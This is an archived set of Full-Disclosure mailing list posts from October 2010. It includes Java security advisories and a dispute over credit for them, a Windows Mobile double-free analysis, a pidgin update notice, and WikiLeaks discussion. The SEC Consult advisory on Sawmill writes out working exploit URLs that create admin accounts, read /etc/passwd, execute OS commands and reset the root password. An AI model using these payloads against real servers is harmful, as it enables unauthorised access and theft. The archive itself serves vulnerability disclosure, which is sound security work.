[Full-disclosure] Java Multiple Issues

2010-10-21 Thread Early Warning
Hi all and sorry for cross post,
after several months since I contacted Oracle informing them about ten
issues on Java applet security, they finally released an Java 6 update
22 which fixes several security issues

In particular the issues are the following, sorted by impact:

* Information Disclosure:
  - 17364779 NETWORKINTERFACE HASHCODE PROBLEM
  - 17322679 JAVA APPLET DNS IP DISCLOSURE
* User Assisted Arbitrary Execution:
  - 17322757 ZERO TERMINATOR ALLOWS JNLP SHORTCUTS
  - 17322755 NEW LINES IN JNLP TITLE ARE COPIED INTO LNK FILES
* Network and WEB Attacks:
  - 17322683 HTTP REQUEST SPLITTING WITH JAVA ADDREQUESTPROPERTY
  - 17764405 DNS REBINDING ISSUE
  - 17322681 JAVA APPLET SAME IP HOST ACCESS

You can read all details here:
http://blog.mindedsecurity.com/2010/10/java-6u21-seven-issues-summary.html


Disclosure Timeline:
20th Apr - 6 May 2010: Advisories sent to Oracle
25th June 2010: Oracle Confirms all issues
12 Oct 2010: Java update 22 released which fixes 7 out of 10 issues.
11-20 Oct 2010: Minded Security Advisories pubicly disclosed.


Cheers,
Stefano Di Paola

--
Stefano Di Paola
Chief Technology Officer, Lead Auditor ISO 27001
Minded Security - Application Security Consulting

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Rooted CON 2011: Welcome Hex Rays as new sponsor

2010-10-21 Thread Román Ramírez
Hello all,

We don't send emails to communicate sponsorships as we undertsand is
quite disturbing and we all receive a lot of email.

But this is a special situation as I want to transmit a big THANK YOU to
the Hex Rays team, and specially to Ilfak Guilfanov, as he has been
absolutely kind with us, giving it support as quick as he was able to.

IDA Pro es a great product, but the team behind is the greatest.

Thanks a lot, Hex Rays

http://www.facebook.com/l/e0f03FgjJ4fe1x13sURaCdSeCgQ;www.rootedcon.es/eng/blog/2010/10/new-rooted-con-2011-sponsor-hex-rays.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Early Warning
Hey,
Michal thanks for the reply to defend credits :).

I had some moderation issues when I tried to send some word about this.
Just for sake of clarification:
I sent the advisory to Oracle on 20th April 2010. Oracle acknowledged
the issue on june.

If Roberto sent the advisory to Oracle then Oracle just didn't tell
him they already knew about it.
If Roberto just sent the issue to Apache then no one's faulty. :)
Anyway I hope credits will be at least shared between me and Roberto.

Cheers,
Stefano

2010/10/20 Michal Zalewski lcam...@coredump.cx:
 Security-Assessment.com follows responsible disclosure
 and promptly contacted Oracle after discovering
 the issue. Oracle was contacted on August 1,
 2010.

 My understanding is that Stefano Di Paola of Minded Security reported
 this back in April; and further, the feature was a part of reasonably
 well-documented functionality of Java pretty much ever since:

 http://download.oracle.com/javase/6/docs/api/java/net/URL.html

 Two hosts are considered equivalent if both host names can be
 resolved into the same IP addresses

 This was a pretty horrible design, so it's good to see it gone, though.

 /mz

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Billy Rios
In the patch for CVE-2008-5343 (GIFAR) Sun tightened their file parsing
rules for remote JAR files, making it harder to smuggle JAR files onto the
end of other filetypes.  This makes it more difficult to create a GIF+JAR
hybrid file.  AFAIK, local JAR files were considered out of scope and will
not be subject to the additional file parsing scrutiny.

Sun/Oracle has not removed the ability to modify arbitrary HOST headers.
 So, if an attacker can upload a JAR file to a web app, they will have the
ability to jump to any domain (virtual hosted or subdomain) that exists on
the server.  The cookies sent by the applet will be from the domain provided
in the URL object, however the content returned by the server will be from
the domain specified in the HOST header.  This can cause havoc for places
where separation relies on subdomains (like wordpress.com et al.) where
users have by-design control of content on one subdomain and uses that
content to target users on a different subdomain.

Java also doesn't respect file extension, content-type, or
content-disposition returned by the web server making it a bit easier to
upload JAR files to unsuspecting web apps.


BK


On Wed, Oct 20, 2010 at 1:18 PM, Chris Evans scarybea...@gmail.com wrote:

 On Wed, Oct 20, 2010 at 8:58 AM, Michal Zalewski lcam...@coredump.cxwrote:

  Security-Assessment.com follows responsible disclosure
  and promptly contacted Oracle after discovering
  the issue. Oracle was contacted on August 1,
  2010.

 My understanding is that Stefano Di Paola of Minded Security reported
 this back in April; and further, the feature was a part of reasonably
 well-documented functionality of Java pretty much ever since:

 http://download.oracle.com/javase/6/docs/api/java/net/URL.html


 The Host: header trick was also used back in 2008 in Billy Rios' GIFAR
 attack -- to get around the fact that Picasa hosts images on a separate
 domain:

 http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/

 The blog post title was SUN Fixes GIFARs, although it's not immediately
 obvious to me what was changed or fixed.

 If anyone knows what was changed back then and/or in this latest release,
 it would be interesting to see it documented.


 Cheers
 Chris




 Two hosts are considered equivalent if both host names can be
 resolved into the same IP addresses

 This was a pretty horrible design, so it's good to see it gone, though.

 /mz

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Stefano Di Paola
Hi Roberto,
nice to see you always alive and kicking!

It seems we found the same stuff :) my bad I haven't yet published it.

Soon also my advisory with some collateral effect^N^N^N^N^N^Nthoughts.

Cheers
Stefano


Il giorno mer, 20/10/2010 alle 00.20 +1300, Roberto Suggi Liverani ha
scritto:
 (, ) (,
   .   `.' ) ('.',
). , ('.   ( ) (
   (_,) .`), ) _ _,
  /  _/  / _  \     _  
  \  \==/ /_\  \ _/ ___\/  _ \ / \ 
  /   \/   |\\  \__(  _ )  Y Y  \
 /__  /\___|__  / \___  /|__|_|  /
 \/ \/.-.\/ \/:wq 
 (x.0)
   '=.|w|.='
   _='```=.
 
   presents..
 
 Oracle JRE - java.net.URLConnection class – 
 Same-of-Origin (SOP) Policy Bypass
 
 PDF: 
 http://www.security-assessment.com/files/advisories/Oracle_JRE_java_net_urlconnection_SOP_Bypass.pdf
 CVE Identifier: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3573
 
 
 +---+
 |Description|
 +---+
 
 Security-Assessment.com discovered that a Java Applet 
 making use of java.net.URLConnection class can be used 
 to bypass same-of-origin (SOP) policy and domain based 
 security controls in modern browsers when communication 
 occurs between two domains that resolve to the same IP 
 address. This advisory includes a Proof-of-Concept 
 (PoC) demo and a Java Applet source code, which 
 demonstrates how this security can be exploited to leak 
 cookie information to an unauthorised domain, which 
 resides on the same host IP address.
 
 ++
 |Exploitation|
 ++
 
 The Flash movie demo can be viewed at the following 
 link:
 
 http://www.security-assessment.com/files/advisories/java_net_urlconnection_sop_bypass_demo.swf
 
 Proof of Concept (PoC) in demo demonstrates that a 
 Cross Site Request Forgery (XSRF) attack can be leveraged 
 by using a Java Applet which implements the 
 java.net.URLConnection class. Traditionally, XSRF is used 
 to force a user to perform an unwanted action on a target 
 web site. In this case, the PoC shows that XSRF can be 
 used to capture sensitive information such as cookie 
 associated to a target web site.
 
 The following assumptions are made in this PoC:
 
 1. Virtual hosts www.targetsite.net and 
 www.badsite.com resolve to the same IP address;
 
 2. Malicious user controls www.badsite.com web site;
 
 3. Malicious user targets www.targetsite.net users.
 
 The following list summarises the sequence of actions 
 shown in the demo:
 
 
 1. User has a valid cookie for www.targetsite.net
 
 2. The same user visits www.badsite.com which performs 
 a cross site forged request to www.targetsite.net . 
 The forged request is performed by a Java Applet 
 embedded on the malicious site. The Java Applet 
 bypasses the Same-of-Origin policy as an unsigned Java 
 Applet should not be able to communicate 
 from www.badsite.com to www.targetsite.net without 
 a crossdomain.xml policy file.
 
 3. Java Applet performs first GET request to 
 www.targetsite.net. At this stage, the Java Applet 
 controls the Cookie: header sent to www.targetsite.net
 through the getRequestProperty(cookie) method.
 This is in breach with SOP.
 
 4. A second request is done for the purpose 
 of the demo which leaks www.targetsite.net 
 cookie’s to www.badsite.com via an HTTP GET 
 request.
 
 
 Testing was successfully performed using Java(TM) 
 SE Runtime Environment (build 1.6.0_21-b07) and the 
 following browsers:
 
 - Mozilla Firefox 3.5.8 (Windows XP)
 - Opera 10.60 (Windows XP)
 - Internet Explorer 6.0.2900.5512 (Windows XP)
 - Google Chrome 5.0.375.9 (Windows XP)
 - Internet Explorer 8.0.6001.18702 (Windows XP)
 - Safari 5.0 (7533.16) (Windows XP)
 
 The Java Applet source code used in the demo can be 
 downloaded at the following link:
 
 http://www.security-assessment.com/files/advisories/MaliciousJavaApplet.zip
 
 ++
 |Solution|
 ++
 
 Security-Assessment.com follows responsible disclosure
 and promptly contacted Oracle after discovering
 the issue. Oracle was contacted on August 1,
 2010.
 
 Oracle has created a fix for this vulnerability which 
 has been included as part of Critical Patch Update 
 Advisory - October 2010. Security-Assessment.com 
 recommends all users of JRE and JDK to upgrade to 
 the latest version as soon as possible. 
 
 For more information on the new release of JRE/JDK 
 please refer to the link:
 
 http://www.oracle.com/technetwork/java/javase/downloads/index.html
 
 +--+
 |Credit|
 +--+
 
 Discovered and advised to Oracle
 August 2010 by Roberto Suggi Liverani of 
 Security-Assessment.com.
 
 Personal site: http://malerisch.net
 
 +-+
 |Extra|
 +-+
 
 Another interesting attack was discovered as part 
 of the research on this vulnerability.
 This attack is another example of leveraging XSRF 
 with the potential of leaking cookie, basic and digest
 authentication tokens using Java Applet and the 
 Compability 

Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Stefano Di Paola
Hey all,
I think it's Oracle bad.
I reported to Oracle this issue back on april 20th and probably Oracle
when Roberto reported the same stuff on August just said Thank you and
nothing more to Roberto.

Also Oracle seems to do mass credit so everyone can think that anyone
found anything among the 29 advisories :D
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html

Anyway, I'll post the advisory today clarification :)

Cheers 
Stefano


Il giorno mer, 20/10/2010 alle 08.58 -0700, Michal Zalewski ha scritto:
  Security-Assessment.com follows responsible disclosure
  and promptly contacted Oracle after discovering
  the issue. Oracle was contacted on August 1,
  2010.
 
 My understanding is that Stefano Di Paola of Minded Security reported
 this back in April; and further, the feature was a part of reasonably
 well-documented functionality of Java pretty much ever since:
 
 http://download.oracle.com/javase/6/docs/api/java/net/URL.html
 
 Two hosts are considered equivalent if both host names can be
 resolved into the same IP addresses
 
 This was a pretty horrible design, so it's good to see it gone, though.
 
 /mz
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass

2010-10-21 Thread Matthew Bergin

the keys to the interwebz!


 CC: roberto.su...@security-assessment.com; full-disclosure@lists.grok.org.uk; 
 bugt...@securityfocus.com
 From: d...@doxpara.com
 Subject: Re: [Full-disclosure] Security-Assessment.com Advisory: Oracle JRE - 
 java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass
 Date: Wed, 20 Oct 2010 10:38:12 -0700
 To: lcam...@coredump.cx
 
 
 
 Sent from my iPhone
 
 On Oct 20, 2010, at 8:58 AM, Michal Zalewski lcam...@coredump.cx wrote:
 
  Security-Assessment.com follows responsible disclosure
  and promptly contacted Oracle after discovering
  the issue. Oracle was contacted on August 1,
  2010.
  
  My understanding is that Stefano Di Paola of Minded Security reported
  this back in April; and further, the feature was a part of reasonably
  well-documented functionality of Java pretty much ever since:
  
  http://download.oracle.com/javase/6/docs/api/java/net/URL.html
  
  Two hosts are considered equivalent if both host names can be
  resolved into the same IP addresses
  
  This was a pretty horrible design, so it's good to see it gone, though.
 
 Eh, you can see where it came from though. Design bugs like this are 
 absolutely miserable to fix (see how we'll never get rebinding out of the 
 browser) and letting identical IP's script against eachother lets an awful 
 lot of legitimate traffic through while blocking almost all attacks.
 
 I'm not saying it's a preferred design, but let's reserve horrible for 
 things that don't have quite the obvious thought process behind them.
 
 Is this, in fact, gone now?
 
  
  /mz
  
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SecurityArchitect-009]: Microsoft Windows Mobile Double Free Vulnerability

2010-10-21 Thread musashi karak0rsan

Vendor: Microsoft
Product: Windows Mobile
Vulnerability: Double Free
Tested vulnerable versions: Windows Mobile 6.1 and 6.5
Tested on : HTC Touch (WM 6.1), HTC Touch2 (WM 6.5)
CREDITS: Celil Ünüver from SecurityArchitect.Org
CONTACT: celilunuver[n0sp4m]gmail.com
Vulnerability Details and Analysis:
The vulnerability is a double free. It occurs when multiple buffers are 
allocated to handle a very large Name (N) field in the vCard (.vcf) file. This 
file can be received by MMS or Bluetooth. After opening the malformed vcf file, 
it gives an error dialog. Then it frees the buffers and crashes;
pimutil.dll:
.text:02B73DE0 sub_2B73DE0 ; CODE XREF: 
sub_2B74388+1Cp.text:02B73DE0   STMFD   SP!, {R4,LR}.text:02B73DE4   
MOV R4, R0.text:02B73DE8   LDR R2, [R4,#0xC].text:02B73DEC   
LDR R3, =off_2B66DB8.text:02B73DF0   CMP R2, #0.text:02B73DF4   
LDRNE   R0, [R4,#8].text:02B73DF8   STR R3, [R4].text:02B73DFC   
BLNEsub_2BA6350.text:02B73E00   LDR R0, [R4,#8].text:02B73E04   
BL  sub_2BA56F8 ; sysfreestrng().text:02B73E08   LDR R0, [R4,#0x14] 
*!*.text:02B73E0C   BL  sub_2BA56F8 ; sysfreestring.text:02B73E10   
LDR R0, [R4,#0x14] *DOUBLE FREE!!!**.text:02B73E14   BL  
sub_2BA56F8 ; sysfreestring.text:02B73E18   LDR R0, 
[R4,#8].text:02B73E1C   BL  sub_2BA56F8.text:02B73E20   LDR R3, 
=(dword_2B66D30+8).text:02B73E24   STR R3, [R4].text:02B73E28   
LDMFD   SP!, {R4,LR}.text:02B73E2C   BX  LR
*As you see that the pointer at [R4 + 0x14] is passed to SysFreeString() twice. 
text:0271E4C0 SysFreeString   ; CODE XREF: 
sub_271AE68+1Cp.text:0271E4C0 ; 
sub_271AE68+24p text:0271E4C0 STMFD   SP!, 
{R4,LR}.text:0271E4C4 CMP R0, #0.text:0271E4C8  
   BEQ loc_271E508.text:0271E4CC LDR R3, 
=0x1ECD1B8.text:0271E4D0 SUB R4, R0, #8.text:0271E4D4   
  LDR R0, [R3].text:0271E4D8 BL  
sub_27391B8.text:0271E4DC CMP R0, #0.text:0271E4E0  
   BNE loc_271E4F4.text:0271E4E4 MOV R0, 
R4.text:0271E4E8 BL  sub_2739168.text:0271E4EC  
   LDMFD   SP!, {R4,LR}.text:0271E4F0 BX  LR.text:0271E4F4 
; 
---.text:0271E4F4.text:0271E4F4
 loc_271E4F4 ; CODE XREF: 
SysFreeString+20j.text:0271E
 4F4 LDR R3, [R4] -CRASH !!.text:0271E4F8  
   MOV R1, R4.text:0271E4FC ADD R3, R3, 
#0x19.text:0271E500 BIC R2, R3, #0xF.text:0271E504  
   BL  sub_27295BC.text:0271E508

*The code at location 0271E4F4  is attempting to extract the 'size' from the 
heap chunk header. 

Exploiting:
Double Frees are usually exploitable but in this case it doesnt look simple. 
The calls to free() occurs in immediate succession. WinCE supports 
multi-threading, but this is an extremely hard case to try.. I do not have deep 
knowledge about WinCE heap structures. So it may be denial of service but I 
think it can be possible to exploit this vulnerability. (impossible is nothing 
! :P)
Proof of Concept:
www.securityarchitect.org/exploits/wmpoc.vcf
Vendor-Patch Status:It's 0day :]Actually I contacted Microsoft but they said 
;we fixed this issue on WM 6.5 version and we can not publish a bulletin for 
it But i m sure that it is not fixed on 6.5 version. I've tested it on several 
devices which have WM 6.5. Also I've tested it on WM 6.5 Professional Emulator 
(which can be downloaded from MS Pages) , it crashes too
Last Words:We are not dead , just busy !
Greets to: SecurityArchitect Members (Ulascan) , Hellcode, murderkey ...
Links:www.securityarchitect.orgblog . securityarchitect . org   
  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Rooted CON 2011: Welcome Hex Rays as new sponsor

2010-10-21 Thread Mario Vilas
paranoid Uhm, why the redirection through Facebook? /paranoid

2010/10/21 Román Ramírez pat...@0z0ne.com

 Hello all,

 We don't send emails to communicate sponsorships as we undertsand is
 quite disturbing and we all receive a lot of email.

 But this is a special situation as I want to transmit a big THANK YOU to
 the Hex Rays team, and specially to Ilfak Guilfanov, as he has been
 absolutely kind with us, giving it support as quick as he was able to.

 IDA Pro es a great product, but the team behind is the greatest.

 Thanks a lot, Hex Rays


 http://www.facebook.com/l/e0f03FgjJ4fe1x13sURaCdSeCgQ;www.rootedcon.es/eng/blog/2010/10/new-rooted-con-2011-sponsor-hex-rays.html

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
HONEY: I want to… put some powder on my nose.
GEORGE: Martha, won’t you show her where we keep the euphemism?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] SEC Consult SA-20101021-0 :: Multiple critical vulnerabilities in Sawmill log analysis software

2010-10-21 Thread Johannes Greil
SEC Consult Security Advisory  20101021-0 
===
  title: Multiple critical vulnerabilities
product: Sawmill - Universal Log File Analysis
 vulnerable version: Sawmill Enterprise  v8.1.7.3
  fixed version: v8.1.7.3
 impact: critical
   homepage: http://www.sawmill.net
  found: 2010-07-20
 by: J. Greil / SEC Consult / www.sec-consult.com
===

Vendor description:
---
Sawmill is universal log analysis software that runs on every major
platform. It can process almost any type of log data. The reports that
Sawmill generates are hierarchical, attractive, and heavily
cross-linked for easy navigation. Complete documentation is built
directly into the program.

source:
http://www.sawmill.net/features.html


Vulnerability overview/description:
---
Sawmill suffers from multiple critical vulnerabilities which allow an
_unauthenticated_ attacker to gain administrative rights. Furthermore
it is possible to access (RW) the file system and execute arbitrary
commands on the operating system without authentication.

Attackers with valid accounts are able to reset the root password or
add/delete log profiles, view and manipulate admin settings etc.

It must be noted that further vulnerabilities are to be expected 
within the software (such as buffer overflows, etc.). Due to lack of 
time no further vulnerabilities could be searched.


1) Unauthenticated access to critical functions
Unauthenticated attackers are e.g. able to create new user accounts 
with administrative Manager roles. It is possible to exploit the 
built-in salang scripting language to read/write files on the file 
system (e.g. user configuration with MD5 hashes), connect to other 
internal systems or execute arbitrary operating system commands.


2) Insufficient validation of user access rights
Users with standard access rights/roles (e.g. Statistics Visitor) are
able to access functions or methods of the Sawmill application where
they shouldn't have access to (default permissions of installation).

Statistics visitor users are able to access administrative functions
or admin menus in order to gain sensitive information or even manipulate
settings, create new profiles or delete profiles. The creation of new
profiles also results in a denial-of-service (temporarily until admin
deletes profiles) if more profiles are being created than the license
currently allows.

It is possible to access the Sawmill setup page in order to reset the
Sawmill root username and password with a standard user account.

A standard user is also able to gain access to more functions within
the interface (e.g. regarding profiles) just by changing local
JavaScript variables, e.g. through an intercepting proxy server.


3) XSS / CSRF
There are many parameters which are not properly sanitised and
vulnerable to XSS. Furthermore no protection against CSRF is in place 
which e.g. allows remote attackers to reset the root password by 
e.g. exploiting the vulnerabilities in section 1 or 2.


Proof of concept:
-
1) Unauthenticated access to critical functions

* Create a user account with admin rights:
http://$host/?a=cuu=testingpw=testingroles=role_1

* Read files of the file system:
http://$host/?a=eeexp=error(read_file('/etc/passwd'))
http://$host/?a=eeexp=error(read_file('LogAnalysisInfo/users.cfg'))

(error() call is needed to print the output within the web interface
instead of stdout)

* Write files:
E.g. use the write_file() method

* Execute OS commands:
http://$host/?a=eeexp=exec('/bin/ls','Output',1))
(exec() only returns PID and no output. I'll leave it to the
creativity of the reader to further exploit this :))


2) Insufficient validation of user access rights

* Access to the new profile wizard including file browser as standard
  Statistics viewer user:
  This feature also allows to choose arbitrary files as log analysis
  input and to disclose its contents then (file disclosure):
  
http://$host/?dp+templates.new_profile_wizard.index

* Access the Sawmill setup page to reset Sawmill root password:
http://$host/?dp=templates.setup

* Gain sensitive information, such as config/user settings:
http://$host/?dp=templates.admin_pages.users.get_datav.fp.is_root_admin=truev.fp.is_unlimited_grants=true

http://$host/?dp=templates.admin_pages.root_admin.get_data
[... see file system for further pages ...]

* Manipulate/create/delete user accounts:
  POST /?dp+templates.admin_pages.users.save_data 
  Host: $host

  v.fp.is_enterprise=true
  v.fp.deleted_users=
  v.fp.users.user_1.is_new=false
  v.fp.users.user_1.username=x
  v.fp.users.user_1.password=
  v.fp.users.user_1.language=
  v.fp.users.user_1.created_by_user=root_admin
  v.fp.users.user_1.access.0.all_profiles=false
  v.fp.users.user_1.access.0

[Full-disclosure] [ MDVSA-2010:208 ] pidgin

2010-10-21 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:208
 http://www.mandriva.com/security/
 ___

 Package : pidgin
 Date: October 21, 2010
 Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A security vulnerability has been identified and fixed in pidgin:
 
 It has been discovered that eight denial of service conditions exist
 in libpurple all due to insufficient validation of the return value
 from purple_base64_decode(). Invalid or malformed data received in
 place of a valid base64-encoded value in portions of the Yahoo!, MSN,
 MySpaceIM, and XMPP protocol plugins and the NTLM authentication
 support trigger a crash. These vulnerabilities can be leveraged by
 a remote user for denial of service (CVE-2010-3711).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149products_id=490
 
 This update provides pidgin 2.7.4, which is not vulnerable to this
 issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3711
 http://pidgin.im/news/security/
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 01b8018cd3acd742b80ae39cf9437f61  2009.0/i586/finch-2.7.4-0.1mdv2009.0.i586.rpm
 7e9adf0099fc897f11377897f879b8ee  
2009.0/i586/libfinch0-2.7.4-0.1mdv2009.0.i586.rpm
 149fce87377d5d0b2c33b616f45c973a  
2009.0/i586/libpurple0-2.7.4-0.1mdv2009.0.i586.rpm
 704fe07620e9822116bf7d7d0d58d7b2  
2009.0/i586/libpurple-devel-2.7.4-0.1mdv2009.0.i586.rpm
 e1c4593f294198e53b9a3fe1a0bab068  
2009.0/i586/pidgin-2.7.4-0.1mdv2009.0.i586.rpm
 96bdc026fd3bcdc86f3a2968dc346253  
2009.0/i586/pidgin-bonjour-2.7.4-0.1mdv2009.0.i586.rpm
 e200d998e4d1e02bbf2c6c1813199c55  
2009.0/i586/pidgin-client-2.7.4-0.1mdv2009.0.i586.rpm
 3b0973e9f4a7a3850699ecbf05c7594f  
2009.0/i586/pidgin-gevolution-2.7.4-0.1mdv2009.0.i586.rpm
 65a4bc6fbc1ad89e1985ebecd5420255  
2009.0/i586/pidgin-i18n-2.7.4-0.1mdv2009.0.i586.rpm
 70b78c339f53fb9c3dab8c6ac587d903  
2009.0/i586/pidgin-meanwhile-2.7.4-0.1mdv2009.0.i586.rpm
 ac8affa20bd6bb5e93987804885f6bfc  
2009.0/i586/pidgin-perl-2.7.4-0.1mdv2009.0.i586.rpm
 195a4a495944d9d59abff9f7617a877a  
2009.0/i586/pidgin-plugins-2.7.4-0.1mdv2009.0.i586.rpm
 26c08e34c2392f67994811b18286d2cd  
2009.0/i586/pidgin-silc-2.7.4-0.1mdv2009.0.i586.rpm
 9dde81a28d9f1538cd9d97c48fdcf991  
2009.0/i586/pidgin-tcl-2.7.4-0.1mdv2009.0.i586.rpm 
 bbfe063e27008c72e0a2f9793906f5e4  
2009.0/SRPMS/pidgin-2.7.4-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 b47c892f7c4874a95dd98bb6864354cc  
2009.0/x86_64/finch-2.7.4-0.1mdv2009.0.x86_64.rpm
 08d882fd48a6e2e74716a3605751475a  
2009.0/x86_64/lib64finch0-2.7.4-0.1mdv2009.0.x86_64.rpm
 9b77d3f7691759132cd83c143d545bbc  
2009.0/x86_64/lib64purple0-2.7.4-0.1mdv2009.0.x86_64.rpm
 db9e939bd921d388aa28e3da5e1f1e74  
2009.0/x86_64/lib64purple-devel-2.7.4-0.1mdv2009.0.x86_64.rpm
 f34250d75b0fd111c45ee8e3a7e066f2  
2009.0/x86_64/pidgin-2.7.4-0.1mdv2009.0.x86_64.rpm
 d372c8bb109cb12708b9e02706879411  
2009.0/x86_64/pidgin-bonjour-2.7.4-0.1mdv2009.0.x86_64.rpm
 cef6333cc6b7aedd8eb5d38a38925506  
2009.0/x86_64/pidgin-client-2.7.4-0.1mdv2009.0.x86_64.rpm
 12fb53acdd919875a6ca23ee2a2e6fa4  
2009.0/x86_64/pidgin-gevolution-2.7.4-0.1mdv2009.0.x86_64.rpm
 29077064095cc4fb8ef64bd06e7f495c  
2009.0/x86_64/pidgin-i18n-2.7.4-0.1mdv2009.0.x86_64.rpm
 5d71995b91428993338169017a853e6f  
2009.0/x86_64/pidgin-meanwhile-2.7.4-0.1mdv2009.0.x86_64.rpm
 cafd698ff2ccc9a0b1b63e3e4724ceba  
2009.0/x86_64/pidgin-perl-2.7.4-0.1mdv2009.0.x86_64.rpm
 e4f1437744385900c5c3bb2f7a34e41e  
2009.0/x86_64/pidgin-plugins-2.7.4-0.1mdv2009.0.x86_64.rpm
 4c88b13b9066c871e656d6c7b5de3749  
2009.0/x86_64/pidgin-silc-2.7.4-0.1mdv2009.0.x86_64.rpm
 f1b7210f0909e75bb1ea6ab8dacb6474  
2009.0/x86_64/pidgin-tcl-2.7.4-0.1mdv2009.0.x86_64.rpm 
 bbfe063e27008c72e0a2f9793906f5e4  
2009.0/SRPMS/pidgin-2.7.4-0.1mdv2009.0.src.rpm

 Mandriva Linux 2010.0:
 4a807e2430c8de3afef0fd8705c64756  2010.0/i586/finch-2.7.4-0.1mdv2010.0.i586.rpm
 37c9fa1be9da720ab2df2a23d05b2e45  
2010.0/i586/libfinch0-2.7.4-0.1mdv2010.0.i586.rpm
 01b0d18fdd89e7e9d21e1efcb7ed25ef  
2010.0/i586/libpurple0-2.7.4-0.1mdv2010.0.i586.rpm
 b09905fe21241e96782d31836aa569f6  
2010.0/i586/libpurple-devel-2.7.4-0.1mdv2010.0.i586.rpm
 d567efd8c615daf2775c1ddce4564021  
2010.0/i586/pidgin-2.7.4-0.1mdv2010.0.i586.rpm
 bf724f06c191e8650020fb6003f3faba  
2010.0/i586/pidgin-bonjour-2.7.4-0.1mdv2010.0.i586.rpm
 461e35ca45634158c58272611e4ddacb  
2010.0/i586/pidgin-client-2.7.4-0.1mdv2010.0.i586.rpm
 

[Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Harry Behrens
Sorry to all of those who think this is gossiping, but:

Wikileaks has been down for ca. 2 weeks now during which time the US has 
at least cut off their financial channels.
This during a period where WL has announced another major leak release 
this time re. Iraq.
What is also extremely disconcerting is the absolute silence of _all_ 
main street media to the topic (gag...?)

Now the latest tweet reads:
WikiLeaks communications infrastructure is currently under attack. 
Project BO move to coms channel S. Activate Reston5.

Yet again I would like to pint out that there seems to be a concerted 
high power attack going on against WL
And yet again I would like to point out it would be interesting to know 
what is rally happening.
And yet again I'd like to emphasize that this indeed a security issue; 
it does concern netizens and citizens in general if major government 
organisations engage in what seems to be a dirty war against a 
whistleblowing organisation.

If anybody knows more, pls. do share insights...

 Harry


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Cal Leeming [Simplicity Media Ltd]
This will be my first and last post on this topic (again).

I've just finished watching some videos about what wikileaks have been
doing.

It appears that they released a bunch of documents that revealed information
such as GPS co-ords + details of those who co-op'd with soldiers. He also
posted the names of these people too, and a bunch of information which
could jeopardise the protection of soldiers on the ground, from all
countries.

I can appreciate his previous efforts, but what he has done here is put many
lifes at risk, both civilians and soldiers.

So, if the US military have launched an all our war on Wikileaks, whether it
be legal or not, I can't say it would be entirely shocking.

On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote:

 Sorry to all of those who think this is gossiping, but:

 Wikileaks has been down for ca. 2 weeks now during which time the US has
 at least cut off their financial channels.
 This during a period where WL has announced another major leak release
 this time re. Iraq.
 What is also extremely disconcerting is the absolute silence of _all_
 main street media to the topic (gag...?)

 Now the latest tweet reads:
 WikiLeaks communications infrastructure is currently under attack.
 Project BO move to coms channel S. Activate Reston5.

